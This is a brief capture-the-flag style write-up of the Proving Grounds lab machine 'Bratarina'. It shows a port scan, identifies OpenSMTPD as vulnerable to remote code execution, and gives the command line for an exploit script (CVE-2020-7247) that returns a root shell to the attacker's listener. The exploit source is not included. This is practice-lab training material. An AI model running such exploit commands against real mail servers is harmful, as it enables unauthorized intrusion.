📔
Hack World
  • Welcome to Hack World
  • Writeup
    • Proving Grounds - Practice
      • AuthBy
      • Jacko
      • UT99
      • Sirol
      • Twiggy
      • Bratarina
      • Internal
      • Algernon
      • Metallus
      • Kevin
      • Helpdesk
      • Slort
      • Shenzi
      • Pelican
      • Walla
      • Zino
      • Nibbles
      • ZenPhoto
      • Wombo
    • CyberSecLabs
      • Lazy
      • Red
      • Shock
      • CMS
      • Debug
      • Leakage
      • Simple
      • Shares
      • Unroot
      • Outdated
      • Fuel
      • Pie
    • Vulnhub
      • Linux
        • BTRSys2.1
        • CyberSploit1
        • SunsetNoontide
    • HackTheBox
      • Cap
Powered by GitBook
On this page
  • nmap
  • Exploitation

Was this helpful?

  1. Writeup
  2. Proving Grounds - Practice

Bratarina

PreviousTwiggyNextInternal

Last updated 3 years ago

Was this helpful?

nmap

mkdir nmap 
sudo rustscan -a 192.168.225.71 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-vuln-scan --script vuln

OpenSMTPD is open on port 25

There's a possible RCE on this particular service.

Exploitation

Copy the main.py file in your local machine. And install pwntools

pip3 install pwntools

Run the exploit

sudo python exploit.py 192.168.225.71 25 192.168.49.225 80 root

And you should get your root shell.

Thanks for reading!

After doing some GoogleFu, I found this better version of the exploit:

https://github.com/QTranspose/CVE-2020-7247-exploit